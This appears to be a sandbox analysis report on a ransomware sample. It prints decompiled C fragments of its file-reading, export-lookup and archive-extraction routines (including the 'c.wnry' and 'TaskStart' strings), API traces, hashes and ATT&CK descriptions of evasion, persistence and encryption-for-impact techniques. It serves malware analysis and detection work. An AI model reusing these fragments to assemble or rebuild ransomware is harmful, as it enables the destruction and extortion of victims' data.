0x0040196a
0x0040196c
0x00401971
0x00401987
0x0040198a
0x0040198b
0x0040198c
0x0040198f
0x00401990
0x0040199b
0x0040199d
0x0040199f
0x0040199f
0x0040199b
0x00401971
0x00401958
0x004019a0
0x004019a5
0x004019a6
0x004019d5
0x004019e0

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
_local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AllocCreateGlobalReadSize_local_unwind2
String ID:
API String ID: 2811923685-0
Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC

Uniqueness

Uniqueness Score: -1.00%

Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}

0x00405bb2
0x00405bbb
0x00405bd2
0x00405bd7
0x00405bdc
0x00405bdf
0x00405be1
0x00405be4
0x00405c18
0x00405c1b
0x00405c24
0x00405c29
0x00405c32
0x00405c36
0x00405c36
0x00405c38
0x00405c42
0x00405c44
0x00405c6c
0x00405c6f
0x00405c72
0x00405c77
0x00405c7a
0x00405c7d
0x00405c80
0x00405c83
0x00405c90
0x00405c90
0x00405c4c
0x00405c4f
0x00405c51
0x00405c57
0x00405c5b
0x00405c5e
0x00405c61
0x00405c64
0x00405c64
0x00405c96
0x00405c98
0x00000000
0x00405c98
0x00405be9
0x00000000
0x00000000
0x00405c04
0x00405c09
0x00405c20
0x00000000
0x00405c20
0x00405c0b
0x00000000
0x00405bc7
0x00405bca
0x00405c11
0x00405c11
0x00405c9a
0x00405c9e
0x00405c9e

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$Pointer$??2@Create
String ID:
API String ID: 1331958074-0
Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

0x00402928
0x0040292f
0x00402934
0x00402938
0x0040293e
0x004029a5
0x004029a7
0x004029ad
0x00402940
0x00402940
0x00402942
0x00402946
0x0040294a
0x00000000
0x00402951
0x00402951
0x0040295a
0x00402971
0x00402973
0x00402977
0x0040297a
0x00000000
0x0040297c
0x00402981
0x00402983
0x00402986
0x00402989
0x00402993
0x00000000
0x00000000
0x00402995
0x00402998
0x0040299f
0x004029a3
0x0040297e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004029a3
0x004029b4
0x004029b7
0x00000000
0x004029b7
0x0040295c
0x0040295c
0x0040295c
0x00402960
0x00402965
0x00000000
0x00402967
0x00402967
0x004029ba
0x004029bd
0x00000000
0x004029bf
0x004029c8
0x004029c8
0x004029bd
0x00402965
0x0040295a
0x0040294a
0x004029af
0x004029b3

APIs

_stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7

Strings

P!@, xrefs: 00402951, 00402986, 0040295C

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ErrorLast_stricmp
String ID: P!@
API String ID: 1278613211-1774101457
Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}

0x00401dfe
0x00401e00
0x00401e05
0x00401e0e
0x00401e1a
0x00401e21
0x00401e2d
0x00401e32
0x00401e38
0x00401e3b
0x00401e3f
0x00401e41
0x00401e4a
0x00401e5b
0x00401e60
0x00401e65
0x00401e82
0x00401e87
0x00401e87
0x00401e8a
0x00401e8b
0x00401e41
0x00401e90
0x00401e96
0x00401e98
0x00401e07
0x00401e07
0x00401e9d

APIs

strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
GetFileAttributesA.KERNEL32(?), ref: 00401E6E

Strings

c.wnry, xrefs: 00401E55

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AttributesFilestrcmp
String ID: c.wnry
API String ID: 3324900478-3240288721
Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA

Uniqueness

Uniqueness Score: -1.00%

Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00405ca0
0x00405ca6
0x00405cb1
0x00405cb6
0x00405cb6
0x00405cbc
0x00405cbd
0x00405cc6
0x00405ca8
0x00405cac
0x00405cac

APIs

CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD

Strings

$l@, xrefs: 00405C9F

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??3@CloseHandle
String ID: $l@
API String ID: 3816424416-2140230165
Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC

Uniqueness

Uniqueness Score: -1.00%

Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}

0x004019e5
0x004019ec
0x00401a19
0x00000000
0x00401a19
0x004019ee
0x004019f2
0x00401a08
0x00401a10
0x00401a11
0x00401a1d
0x00401a2c
0x00401a3a
0x00401a3e
0x00000000
0x00401a3e
0x00401a13
0x00000000

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CriticalSection$Leave$Entermemcpy
String ID:
API String ID: 3435569088-0
Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MSNRf9dZ63.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\tasksche.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
MSNRf9dZ63.exe

Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175
libraryloaderfileCOMMON

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Function 00408090 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49
serviceCOMMON

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Function 00407C40 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 54
serviceCOMMON

Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175
libraryloaderCOMMON

Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365
COMMONCrypto

Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56
libraryloaderCOMMON

Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75
serviceCOMMON

Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334
COMMONCrypto

Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214
COMMONCrypto

Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214
COMMONCrypto

Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55
memoryCOMMON

Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272
COMMONCrypto

Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271
COMMONCrypto

Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682
COMMONCrypto

Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25
encryptionCOMMON

Function 00404C19 Relevance: .3, Instructions: 331
COMMONCrypto

Function 0040541F Relevance: .1, Instructions: 104
COMMONCrypto

Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65
libraryloaderCOMMON

Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
COMMON

Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106
stringfileCOMMON

Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100
registrystringCOMMON

Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123
COMMON

Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233
memoryCOMMON

Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
